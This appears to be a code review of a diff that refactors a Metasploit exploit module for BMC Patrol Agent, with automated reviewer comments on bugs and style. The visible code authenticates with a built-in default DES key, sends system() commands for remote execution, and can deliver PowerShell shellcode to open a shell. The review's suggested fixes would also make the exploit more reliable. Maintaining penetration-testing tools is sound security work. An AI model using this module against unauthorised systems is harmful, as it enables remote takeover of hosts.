the handler if not running a single command - if datastore['CMD'] == $nil or datastore['CMD'].empty? + # Manually start the handler if not running a single command + if datastore['CMD'].nil? || datastore['CMD'].empty? - #Set to nil if the cmd is empty for checks further down - datastore['CMD'] = $nil + # Set to nil if the cmd is empty for checks further down + datastore['CMD'] = nil datastore['DisablePayloadHandler'] = false - #Configure the payload handler + # Configure the payload handler payload_instance.exploit_config = { 'active_timeout' => 300 } - #Setup the payload handler + # Setup the payload handler payload_instance.setup_handler - #Start the payload handler + # Start the payload handler payload_instance.start_handler end - #Initialize zlib objects + # Initialize zlib objects @deflater = Zlib::Deflate.new(4, 15, Zlib::MAX_MEM_LEVEL, Zlib::DEFAULT_STRATEGY) - @inflater = Zlib::Inflate.new() + @inflater = Zlib::Inflate.new - #Connect to the BMC Patrol Agent + # Connect to the BMC Patrol Agent connect print_status("Connected to BMC Patrol Agent.") - #Create session msg + # Create session msg create_session ret_data = receive_msg - fail_with(Failure::UnexpectedReply, "Failed to receive 
session confirmation. Aborting.") if ret_data == $nil + fail_with(Failure::UnexpectedReply, "Failed to receive session confirmation. Aborting.") if ret_data.nil? - #Authenticate + # Authenticate authenticate_user(datastore['USER'], datastore['PASSWORD']) - #receive the authentication response + # Receive the authentication response ret_data = receive_msg - fail_with(Failure::UnexpectedReply, "Failed to receive authentication response. Aborting.") if ret_data == $nil + fail_with(Failure::UnexpectedReply, "Failed to receive authentication response. Aborting.") if ret_data.nil? ret_msg = process_response(ret_data) if ret_msg =~ /logged in/ 
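Review bot: In get_cmd_output, `cmd_output_msg.index("Result\x00")` and `index("RemPsl_user")` return nil when the marker is missing from the server's reply, and the following `idx_start + 7` then raises NoMethodError on nil rather than going through the module's fail_with path. A guard before the slice keeps the failure mode consistent with the header check just above it: `fail_with(Failure::UnexpectedReply, "Invalid command output msg.") if idx_start.nil? || idx_end.nil?`. The `exploit` method that starts in this hunk continues past its end.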
@@ -276,49 +283,49 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "Login failed. Aborting.") end - #receive the server info + # Receive the server info ret_data = receive_msg - fail_with(Failure::UnexpectedReply, "Failed to receive server info msg. Aborting.") if ret_data == $nil + fail_with(Failure::UnexpectedReply, "Failed to receive server info msg. Aborting.") if ret_data.nil? srv_info = process_response(ret_data) - #Get the target's OS from their info msg + # Get the target's OS from their info msg target_os = get_target_os(srv_info) - # When using auto targeting, MSF selects the Windows meterpreter as the default payload. + # When using autotargeting, MSF selects the Windows meterpreter as the default payload. # Fail if this is the case and ask the user to select an appropriate payload. - if target_os[0] == 'Linux' and payload_instance.name =~ /Windows/ and datastore['CMD'] == $nil + if target_os[0] == 'Linux' && payload_instance.name =~ /Windows/ && datastore['CMD'].nil? fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Linux target.") end target_name = target.name - if datastore['CMD'] != $nil + if !datastore['CMD'].nil? command = datastore['CMD'].tr('"', '\"') print_status("Command to execute: #{command}") elsif target_name == 'Windows Powershell Injected Shellcode' - #Get encoded powershell of payload + # Get encoded powershell of payload command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection') else command = payload.raw.tr('"', '\"') end - #Run command + # Run command run_cmd(command) - #receive command confirmation + # Receive command confirmation ret_data = receive_msg - if ret_data != $nil + if !ret_data.nil? 
process_response(ret_data) end - #receive command output + # Receive command output ret_data = receive_msg - if ret_data != $nil && datastore['CMD'] != $nil - cmd_result_data = process_response( ret_data ) + if !ret_data.nil? && !datastore['CMD'].nil? + cmd_result_data = process_response(ret_data) cmd_result = get_cmd_output(cmd_result_data) - print_status( "Output:\n#{cmd_result}" ) + print_status("Output:\n#{cmd_result}") end - #Handle the shell + # Handle the shell handler end @@ -326,16 +333,16 @@ class MetasploitModule < Msf::Exploit::Remote def receive_msg header = sock.get_once(6) - if header == $nil + if header.nil? return end - payload_size_arr = header[0,4] - payload_size = payload_size_arr.unpack("N")[0] + payload_size_arr = header[0, 4] + payload_size = payload_size_arr.unpack1("N") payload = '' if payload_size > 0 payload = sock.get_once(payload_size) - if payload == $nil + if payload.nil? return end end @@ -349,31 +356,33 @@ class MetasploitModule < Msf::Exploit::Remote data_len = data.length buf = [data_len].pack('N') - #Set the type + # Set the type buf += [type].pack('C') - #Set compression flag + # Set compression flag buf += [compression].pack('C') - #Add data + # Add data buf += data - #Send msg + # Send msg sock.put(buf) end - def process_response( ret_data ) + def process_response(ret_data) - ret_size_arr = ret_data[0,4] - ret_size = ret_size_arr.unpack("N")[0] + # While style checks complain, I intend to leave this parsing + # in place for debugging purposes + ret_size_arr = ret_data[0, 4] + ret_size = ret_size_arr.unpack1("N") # rubocop:disable Lint/UselessAssignment - msg_type = ret_data[4,1] - comp_flag = ret_data[5,1] + msg_type = ret_data[4, 1] # rubocop:disable Lint/UselessAssignment + comp_flag = ret_data[5, 1] payload_data = ret_data[6..-1] if comp_flag == "\x00" - bin_data = payload_data.unpack("H*")[0] + bin_data = payload_data.unpack1("H*") # rubocop:disable Lint/UselessAssignment payload_data = @inflater.inflate(payload_data) end 
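Review bot: The negated nil tests in the exploit body (`if !datastore['CMD'].nil?`, `if !ret_data.nil?`, `if !ret_data.nil? && !datastore['CMD'].nil?`) are the kind of construct Ruby style checks flag, and since `datastore['CMD']` was already normalized to nil for the empty case at the top of `exploit`, plain truthiness reads better: `if datastore['CMD']`, `process_response(ret_data) if ret_data`, and `if ret_data && datastore['CMD']`. This is a readability point only; behaviour is unchanged by either form.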
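Review bot: In receive_msg, `payload_size` is a 32-bit length taken from the peer with no upper bound, and `sock.get_once(payload_size)` returns as soon as any bytes are available, so a reply larger than one read (or a fragmented one) yields a truncated payload that process_response and get_cmd_output cannot detect; the first case also lets a hostile server request an allocation of up to 4 GiB. Reading until the announced length is satisfied, and rejecting lengths above a sane module constant (value to be chosen, placeholder below), closes both. The rest of receive_msg is outside the hunk.
```ruby
    payload_size = payload_size_arr.unpack1("N")
    # MAX_MSG_LEN is a placeholder: pick a bound that covers the largest legitimate Patrol reply
    fail_with(Failure::UnexpectedReply, "Unreasonable message length #{payload_size}") if payload_size > MAX_MSG_LEN
    payload = ''
    while payload.length < payload_size
      chunk = sock.get_once(payload_size - payload.length)
      return if chunk.nil?
      payload += chunk
    end
    # … unchanged: remainder of receive_msg …
```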
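Review bot: The new comment in process_response says the unused `ret_size`, `msg_type` and `bin_data` assignments are kept "for debugging purposes", but none of them is ever printed, so the hex conversion of the whole payload costs a full pass over the data and produces nothing. Replacing the dead `bin_data` line with `vprint_status("Response hex: #{payload_data.unpack1('H*')}")` gives the intended debug output under verbose and removes the rubocop disable; `ret_size` could similarly earn its keep as a check against the received length (presumably `ret_data.length - 6`, if receive_msg returns header plus payload — confirm against its tail, which is outside this hunk). process_response continues past the end of the hunk.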
@@ -384,7 +393,7 @@ class MetasploitModule < Msf::Exploit::Remote def run_cmd(cmd) user_num = rand 1000..9999 - msg_1 = %Q(R_E + msg_1 = %(R_E { \tRE_ID=1 \tRE_PDESC=0\tRemPsl\tsystem("#{cmd}");\tRemPsl_user_#{user_num} @@ -396,48 +405,48 @@ class MetasploitModule < Msf::Exploit::Remote ) msg_1 += "\x00" - #Compress the message + # Compress the message comp_data = @deflater.deflate msg_1, Zlib::SYNC_FLUSH - send_msg( 0x44, 0x0, comp_data ) + send_msg(0x44, 0x0, comp_data) end - def identify( user ) + def identify(user) inner_len = 15 msg_type = 8 len_str = [inner_len].pack("N") msg_str = [msg_type].pack("N") - msg_1 = %Q(PEM_MSG + msg_1 = %(PEM_MSG { -\tNSDL=#{inner_len.to_s} +\tNSDL=#{inner_len} \tPEM_DGRAM=#{len_str}#{msg_str}#{user}\x00 } ) msg_1 += "\x00" - print_status( "Msg: #{msg_1}" ) - bin_data = msg_1.unpack("H*")[0] - #Compress the message + print_status("Msg: #{msg_1}") + bin_data = msg_1.unpack1("H*") # rubocop:disable Lint/UselessAssignment + # Compress the message comp_data = @deflater.deflate msg_1, Zlib::SYNC_FLUSH - send_msg( 0x44, 0x0, comp_data ) + send_msg(0x44, 0x0, comp_data) end - def create_session() + def create_session sess_msg = "\x00\x00\x00\x00\x00\x00\x00\x00\x05\x02\x00\x04\x02\x04\x03\x10\x00\x00\x03\x04\x00\x00\x00\x00\x01\x01\x04\x00\xff\x00\x00\x00" sess_msg += "\x00" * 0x68 - send_msg( 0x45, 0x2, sess_msg ) + send_msg(0x45, 0x2, sess_msg) end - def authenticate_user( user, password ) - #Default encryption key + def authenticate_user(user, password) + # Default encryption key enc_key = 'k$C4}@"_' - output_data = des_crypt_func( password, enc_key, DES_ENCRYPT) - #Convert to hex string - encrpted_pw = output_data.unpack("H*")[0] + output_data = des_crypt_func(password, enc_key, DES_ENCRYPT) + # Convert to hex string + encrpted_pw = output_data.unpack1("H*") des_pw = encrpted_pw.upcase - msg_1 = %Q(ID + msg_1 = %(ID { \tHOST=user \tUSER=#{user} 
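Review bot: In identify, `print_status("Msg: #{msg_1}")` dumps the raw datagram, including its trailing NUL, to the console at normal verbosity, and `bin_data` is again computed and discarded behind a rubocop disable — the same pattern as in process_response. `vprint_status("Msg: #{msg_1}")` keeps the diagnostic available without cluttering a normal run, and the `bin_data` line can go. In authenticate_user the local `encrpted_pw` is misspelled; `encrypted_pw` reads cleaner since the name is used on the next line only. authenticate_user's body continues outside the hunk.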
@@ -452,11 +461,11 @@ class MetasploitModule < Msf::Exploit::Remote msg_1 += "\x00" comp_data = @deflater.deflate msg_1, Zlib::SYNC_FLUSH - send_msg( 0x44, 0x0, comp_data ) + send_msg(0x44, 0x0, comp_data) end - def rotate_block_init( input_block_tuple ) + def rotate_block_init(input_block_tuple) v6 = 0 v5 = 0 @@ -657,14 +666,14 @@ class MetasploitModule < Msf::Exploit::Remote v6 |= 0x80000000 end - #Create return tuple + # Create return tuple ret_block = Array.new ret_block.push v5 ret_block.push v6 ret_block end - def rotate_block_final( input_block_tuple ) + def rotate_block_final(input_block_tuple) v6 = 0 v5 = 0 @@ -865,31 +874,30 @@ class MetasploitModule < Msf::Exploit::Remote v6 |= 0x80000000 end - #Create return tuple + # Create return tuple ret_block = Array.new ret_block.push v5 ret_block.push v6 ret_block end - def load( a1 ) - - a2 = Array.new(8,0) + def load(a1) + a2 = Array.new(8, 0) v3 = a1 a2[0] = a1 & 0xff - v3 >>= 3; + v3 >>= 3 a2[1] = v3 & 0xff - v3 >>= 4; + v3 >>= 4 a2[2] = v3 & 0xff - v3 >>= 4; + v3 >>= 4 a2[3] = v3 & 0xff - v3 >>= 4; + v3 >>= 4 a2[4] = v3 & 0xff - v3 >>= 4; + v3 >>= 4 a2[5] = v3 & 0xff - v3 >>= 4; + v3 >>= 4 a2[6] = v3 & 0xff - v3 >>= 4; + v3 >>= 4 a2[7] = v3 & 0xff a2[0] = (a2[0] * 2) & 0xff a2[7] |= (16 * a2[0]) & 0xff 
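Review bot: The "Create return tuple" tail of rotate_block_init (`ret_block = Array.new`, two `push` calls, then `ret_block`) is four lines for what an array literal says in one: `[v5, v6]`. The same four lines close rotate_block_final in the `@@ -865` hunk, and the same pattern ends desx in the `@@ -900` hunk with `[left, right]`. Both rotate_block_* bodies start outside their hunks, so this applies only to the visible return sequence.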
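Review bot: The body of load in the `@@ -865` hunk repeats the `v3 >>= 4` / `a2[i] = v3 & 0xff` pair six times with only the index changing, which hides the fact that it is a fixed-width unpack and makes an off-by-one in any one copy hard to spot. A small range loop says the same thing once; only the first shift (by 3) differs and stays explicit. load continues past the end of the hunk.
```ruby
  def load(a1)
    a2 = Array.new(8, 0)
    v3 = a1
    a2[0] = a1 & 0xff
    v3 >>= 3
    a2[1] = v3 & 0xff
    (2..7).each do |i|
      v3 >>= 4
      a2[i] = v3 & 0xff
    end
    # … unchanged: a2[0]/a2[7] adjustment and the remainder of load …
```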
@@ -900,56 +908,51 @@ class MetasploitModule < Msf::Exploit::Remote data_block[0] &= 0x3F3F3F3F data_block[1] &= 0x3F3F3F3F data_block - end - - def desx( data_block, ksch, idx) - + def desx(data_block, ksch, idx) ksch = ksch.pack("V*") ksch = ksch.unpack("Q<*") key_block = ksch[idx] data_block_ptr = data_block.pack("V*") - data_block_ptr = data_block_ptr.unpack("Q<*")[0] + data_block_ptr = data_block_ptr.unpack1("Q<*") data_block_ptr ^= key_block - right = 0 - left = 0 counter = 1 data_block_byte_ptr = [data_block_ptr].pack('Q<') left = SBOXES[data_block_byte_ptr[0].ord] right = SBOXES[data_block_byte_ptr[0].ord + (counter << 6)] - counter+=1 + counter += 1 left ^= SBOXES[data_block_byte_ptr[1].ord + (counter << 6)] - counter+=1 + counter += 1 right ^= SBOXES[data_block_byte_ptr[1].ord + (counter << 6)] - counter+=1 + counter += 1 left ^= SBOXES[data_block_byte_ptr[2].ord + (counter << 6)] - counter+=1 + counter += 1 right ^= SBOXES[data_block_byte_ptr[2].ord + (counter << 6)] - counter+=1 + counter += 1 left ^= SBOXES[data_block_byte_ptr[3].ord + (counter << 6)] - counter+=1 + counter += 1 right ^= SBOXES[data_block_byte_ptr[3].ord + (counter << 6)] - counter+=1 + counter += 1 left ^= SBOXES[data_block_byte_ptr[4].ord + (counter << 6)] - counter+=1 + counter += 1 right ^= SBOXES[data_block_byte_ptr[4].ord + (counter << 6)] - counter+=1 + counter += 1 left ^= SBOXES[data_block_byte_ptr[5].ord + (counter << 6)] - counter+=1 + counter += 1 right ^= SBOXES[data_block_byte_ptr[5].ord + (counter << 6)] - counter+=1 + counter += 1 left ^= SBOXES[data_block_byte_ptr[6].ord + (counter << 6)] - counter+=1 + counter += 1 right ^= SBOXES[data_block_byte_ptr[6].ord + (counter << 6)] - counter+=1 + counter += 1 left ^= SBOXES[data_block_byte_ptr[7].ord + (counter << 6)] - counter+=1 + counter += 1 right ^= SBOXES[data_block_byte_ptr[7].ord + (counter << 6)] - #Create return tuple + # Create return tuple ret_block = Array.new ret_block.push left ret_block.push right 
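Review bot: The sixteen unrolled `counter += 1` / `SBOXES[...]` lines in desx encode a regular rule — byte i of the block indexes table slice `2*i` for `left` and `2*i + 1` for `right` — and a loop over the eight bytes makes that rule visible and removes the hand-maintained counter. Separately, `ksch.pack("V*").unpack("Q<*")` repacks the entire key schedule on every call even though only `ksch[idx]` is used; sbox_xors calls desx sixteen times per block, so doing that conversion once in the caller (or indexing the two 32-bit halves directly) would avoid the repeated work — hedged, since the exact layout of `ksch` is produced outside this hunk. desx's return tuple is outside the visible lines.
```ruby
  def desx(data_block, ksch, idx)
    # … unchanged: key_block lookup and data_block_ptr ^= key_block …
    data_block_byte_ptr = [data_block_ptr].pack('Q<')
    left = 0
    right = 0
    data_block_byte_ptr.each_byte.with_index do |byte, i|
      left ^= SBOXES[byte + ((2 * i) << 6)]
      right ^= SBOXES[byte + ((2 * i + 1) << 6)]
    end
    # … unchanged: return tuple …
```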
@@ -957,67 +960,66 @@ class MetasploitModule < Msf::Exploit::Remote end - def store( data_block ) + def store(data_block) a1 = data_block.pack("V*") - val = 8 * (16 * (16 * (16 * (16 * (16 * (16 * a1[7].ord | a1[6].ord) | a1[5].ord) | a1[4].ord) | a1[3].ord) | a1[2].ord) | a1[1].ord) | a1[0].ord >> 1; - val = val & 0xffffffff + val = 8 * (16 * (16 * (16 * (16 * (16 * (16 * a1[7].ord | a1[6].ord) | a1[5].ord) | a1[4].ord) | a1[3].ord) | a1[2].ord) | a1[1].ord) | a1[0].ord >> 1 + val & 0xffffffff end - def sbox_xors( data_block_in, ksch_arg, decrypt_flag) + def sbox_xors(data_block_in, ksch_arg, decrypt_flag) decrypt_flag_cpy = decrypt_flag if (decrypt_flag & 0x100) != 0 data_block_0 = data_block_in else - data_block_0 = rotate_block_init( data_block_in ) + data_block_0 = rotate_block_init(data_block_in) end - #puts data_block_0 encrypt_flag = (decrypt_flag_cpy & 1) == 0 - ti_block_0 = load( data_block_0[0] ) - ti_block_1 = load( data_block_0[1] ) + ti_block_0 = load(data_block_0[0]) + ti_block_1 = load(data_block_0[1]) for i in 0..15 ti_cpy = ti_block_1 if encrypt_flag - ti_block_1 = desx( ti_block_1, ksch_arg, i ) + ti_block_1 = desx(ti_block_1, ksch_arg, i) else - ti_block_1 = desx( ti_block_1, ksch_arg, 15 - i ) + ti_block_1 = desx(ti_block_1, ksch_arg, 15 - i) end ti_block_1[0] ^= ti_block_0[0] ti_block_1[1] ^= ti_block_0[1] ti_block_0 = ti_cpy end - data_block_0[0] = store( ti_block_1 ) - data_block_0[1] = store( ti_block_0 ) + data_block_0[0] = store(ti_block_1) + data_block_0[1] = store(ti_block_0) - if (!(decrypt_flag_cpy & 0x200) != 0 ) - rotate_block_final( data_block_0 ) + if (!(decrypt_flag_cpy & 0x200) != 0) + rotate_block_final(data_block_0) else data_block_0 end end - def set_key_unchecked( key ) + def gen_key_unchecked(key) idx = 0 key_arr = key.unpack("V*") key_sch = Array.new - for i in 0..15 + for i in 0..15 idx += ROTATIONS[i].ord - v6 = 0; - v5 = 0; - v14 = 0; + v6 = 0 + v5 = 0 + v14 = 0 for j in 0..47 - pc2_p1 = ( idx + PC2[j].ord ) % 0x1C + 
pc2_p1 = (idx + PC2[j].ord) % 0x1C if PC2[j].ord > 0x1B pc2_p2 = 0x1c else pc2_p2 = 0 end - v13 = PC1[ pc2_p1 + pc2_p2 ].ord + v13 = PC1[pc2_p1 + pc2_p2].ord if v13 <= 31 v12 = 0 else @@ -1033,7 +1035,7 @@ class MetasploitModule < Msf::Exploit::Remote v11 = 8 * (v10 / 6) + v10 % 6 key_and = key_arr[v12] & SBOX_BYTE_ORDER[v13] - if ( key_and != 0) + if (key_and != 0) if v14 == 1 v6 |= SBOX_BYTE_ORDER[v11] else @@ -1047,17 +1049,17 @@ class MetasploitModule < Msf::Exploit::Remote key_sch end - def des_string_to_key( key_buf_str ) + def des_string_to_key(key_buf_str) - des_keysch_0 = set_key_unchecked(INIT_DES_KEY_0) - des_keysch_1 = set_key_unchecked(INIT_DES_KEY_1) + des_keysch_0 = gen_key_unchecked(INIT_DES_KEY_0) + des_keysch_1 = gen_key_unchecked(INIT_DES_KEY_1) - temp_key1 = Array.new(8,0) - temp_key2 = Array.new(8,0) + temp_key1 = Array.new(8, 0) + temp_key2 = Array.new(8, 0) key_buf_bytes = key_buf_str.unpack("c*") - counter = 0; + counter = 0 key_buf_str_len = key_buf_bytes.length - 1 for i in 0..key_buf_str_len counter %= 8 @@ -1074,18 +1076,15 @@ class MetasploitModule < Msf::Exploit::Remote counter += 1 end - data_block = temp_key1.pack("c*").unpack("V*") - data_block = temp_key2.pack("c*").unpack("V*") - - #Prepare return array - ret_key = Array.new(8,0) + # Prepare the return array + ret_key = Array.new(8, 0) for j in 0..7 ret_key[j] = temp_key2[j] ^ temp_key1[j] end ret_key.pack("c*") end - def des_cbc( input_buf, buf_len, key_sch, iv, decrypt_flag ) + def des_cbc(input_buf, key_sch, iv, decrypt_flag) output_block_arr = Array.new blocks = input_buf.unpack("Q<*") 
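Review bot: In `sbox_xors`, the condition `if (!(decrypt_flag_cpy & 0x200) != 0)` is always true in Ruby: `!` applied to an Integer yields `false` for every value, 0 included, and `false != 0` is `true`, so `rotate_block_final` runs unconditionally and the `else data_block_0` branch is dead code. The symmetric check a few lines earlier, `if (decrypt_flag & 0x100) != 0`, shows the intended shape; writing `if (decrypt_flag_cpy & 0x200) == 0` restores it. With the visible callers passing a `decrypt_flag` of 0 or 1 the 0x200 bit is never set, so the observable result is the same today, but the expression as written will mislead anyone porting or auditing this cipher implementation. The commit reformatted this line without correcting it.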
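Review bot: `des_cbc`'s new signature drops `buf_len`, and the body then relies solely on `input_buf.unpack("Q<*")`, which silently discards any trailing bytes that do not fill a complete 8-byte word; the only visible caller, `des_crypt_func`, pads to a multiple of eight, so this is safe as long as that holds, but a guard such as `raise ArgumentError, 'input_buf must be a multiple of 8 bytes' unless (input_buf.bytesize % 8).zero?` makes the contract explicit now that the length argument is gone. Any caller outside this diff that still passes five arguments will fail with an `ArgumentError`, which is worth confirming across the module. Separately, in `des_string_to_key` the eight-iteration XOR loop filling `ret_key` reduces to `temp_key1.zip(temp_key2).map { |a, b| a ^ b }.pack("c*")`. The `des_cbc` body continues into the next hunk.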
@@ -1099,16 +1098,14 @@ class MetasploitModule < Msf::Exploit::Remote end current_block_tuple = [current_block].pack("Q<").unpack("V*") - output_block_tuple = sbox_xors( current_block_tuple, key_sch, decrypt_flag) - output_block = output_block_tuple.pack("V*").unpack("Q<")[0] + output_block_tuple = sbox_xors(current_block_tuple, key_sch, decrypt_flag) + output_block = output_block_tuple.pack("V*").unpack1("Q<") output_block_arr.push output_block if decrypt_flag == 1 output_block ^= iv - result = cur_block iv = cur_block else - result = output_block iv = output_block end end @@ -1117,17 +1114,11 @@ class MetasploitModule < Msf::Exploit::Remote end - def des_crypt_func( binary_buf, key_buf, decrypt_flag ) + def des_crypt_func(binary_buf, key_buf, decrypt_flag) des_key = des_string_to_key(key_buf) - des_keysch = set_key_unchecked( des_key ) + des_keysch = gen_key_unchecked(des_key) - bin_buf_len = binary_buf.length - if decrypt_flag == 1 - v13 = ((binary_buf.length + 8) & 0xFFFFFFFFFFFFFFF8) - 1 - bin_buf_len = v13 + 1 - end - - temp_enc_buf = Array.new( 8 * ((binary_buf.length + 7) >> 3) + 8, 0) + temp_enc_buf = Array.new(8 * ((binary_buf.length + 7) >> 3) + 8, 0) binary_buf_str = binary_buf.unpack('c*') for j in 0..binary_buf_str.length - 1 @@ -1135,8 +1126,7 @@ class MetasploitModule < Msf::Exploit::Remote end temp_enc_buf = temp_enc_buf.pack('c*') - pw_len_shift = (bin_buf_len + 7) >> 3 - output_buf = des_cbc( temp_enc_buf, 8 * pw_len_shift, des_keysch, 0, decrypt_flag) + output_buf = des_cbc(temp_enc_buf, des_keysch, 0, decrypt_flag) output_buf end
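Review bot: In the decrypt branch of `des_cbc` the `output_block ^= iv` comes after `output_block_arr.push output_block`; because Ruby integers are immutable, the XOR only rebinds the local and the value already pushed stays un-XORed, so a decrypt pass would return the raw block-cipher output rather than the CBC plaintext. The commit deleted the unused `result` assignments but kept this ordering. If decrypt mode is ever exercised (the visible caller forwards `decrypt_flag` unconstrained), `output_block_arr.push output_block` should move below the `end` of the `if decrypt_flag == 1 … else … end` block so the XORed value is what gets stored. If only encryption is used in practice, a comment saying so, and that the decrypt path is untested, would stop the next reader from relying on it. The loop header and the method's return lie outside the hunk.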
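Review bot: `temp_enc_buf` in `des_crypt_func` is sized `8 * ((binary_buf.length + 7) >> 3) + 8`, which zero-pads to the block boundary and then appends a whole additional zero block even when the input is already 8-byte aligned; nothing in the hunk explains why, and the commit removed the `bin_buf_len` arithmetic that hinted at the original intent. A comment such as `# Round up to the block size and append one extra all-zero block; presumably mirrors the agent's own padding — keep in sync with it` would prevent a later cleanup from "fixing" the `+ 8`. The byte-copy loop `for j in 0..binary_buf_str.length - 1`, whose body is outside the hunk, can likely become the slice assignment `temp_enc_buf[0, binary_buf_str.length] = binary_buf_str` if the body performs the element-wise copy it appears to. The method continues in the next hunk.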
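Review bot: The updated call `des_cbc(temp_enc_buf, des_keysch, 0, decrypt_flag)` hard-codes an IV of `0` without saying why, and the trailing `output_buf = …` followed by a bare `output_buf` can simply be the call expression as the method's last line. A fixed zero IV is weak in general, but an exploit module has to reproduce whatever the remote agent does; a one-line comment, `# IV fixed at 0 (presumably dictated by the agent's scheme — confirm against the target)`, records that the choice is deliberate rather than an oversight. Nothing else in this hunk needs changing.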